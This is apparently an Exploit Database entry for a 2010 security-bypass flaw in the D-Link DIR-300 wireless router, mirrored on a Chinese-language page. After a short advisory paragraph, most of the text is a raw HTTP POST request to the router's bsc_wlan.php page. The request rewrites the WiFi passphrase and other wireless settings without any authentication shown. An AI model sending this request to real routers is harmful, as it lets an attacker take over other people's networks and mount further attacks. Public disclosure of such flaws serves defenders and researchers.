D-Link DIR-300 – WiFi Key Security Bypass

• Exploit Database
• 13 阅读

• 作者： Gaurav Saha
  日期： 2010-11-24
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/35014/

• source: https://www.securityfocus.com/bid/45038/info
  
  The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability.
  
  Remote attackers can exploit this issue to modify the WiFi key and possibly other configuration settings. Successful exploits will lead to other attacks. 
  
  POST http://www.example.com/bsc_wlan.php HTTP/1.1
  Host: www.example.com
  User-Agent: Mozilla/5.0
  Accept: text/html,application/xhtml+xml,application/xml
  Accept-Charset: ISO-8859-1,utf-8
  Keep-Alive: 115
  Proxy-Connection: keep-alive
  
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 1000
  
  ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
  <<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1=